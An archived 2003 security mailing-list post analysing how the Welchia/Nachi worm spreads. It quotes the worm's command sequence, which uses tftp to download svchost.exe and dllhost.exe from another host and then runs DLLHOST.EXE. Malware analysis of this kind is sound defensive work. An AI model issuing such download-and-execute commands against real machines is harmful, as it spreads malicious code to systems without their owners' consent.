lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <200308201715.TAA30389@fire.malware.de>
From: malware at t-online.de (Michael Mueller)
Subject: W32/Welchia, W32/Nachi backdoor?

Hi Barry,

you wrote:
> >creates a backdoor listening on TCP/707 or some other randomly chosen port
> between TCP/666 and >TCP/765 [2]
> 
> Telnetting to this port seems to disconnected after 1-5 characters have been
> entered?  This doesn't look like TFTP (port 65/tcp&UDP), and the windows
> tftp client doesn't seem to offer any means of specifying a port to connect
> to?

Mhh, I wouldn't call it a backdoor. 

The client to infect opens the connection with the stdin/-out of CMD.EXE
connected to the socket. Once the connection is established the listener
is waiting for the prompt printed by CMD.EXE and starts giving commands.
These commands look like following:

dir wins\dllhost.exe
dir dllcache\tftpd.exe
tftp -i x.x.x.x get svchost.exe wins\SVCHOST.EXE
tftp -i x.x.x.x get dllhost.exe wins\DLLHOST.EXE
wins\DLLHOST.EXE

If you want to use this socket connection as backdoor to the server, you
have to find an buffer overflow or similiar in the worm code.


Michael

-- 
Linux@...Xpress
http://www-users.rwth-aachen.de/Michael.Mueller4/tekxp/tekxp.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ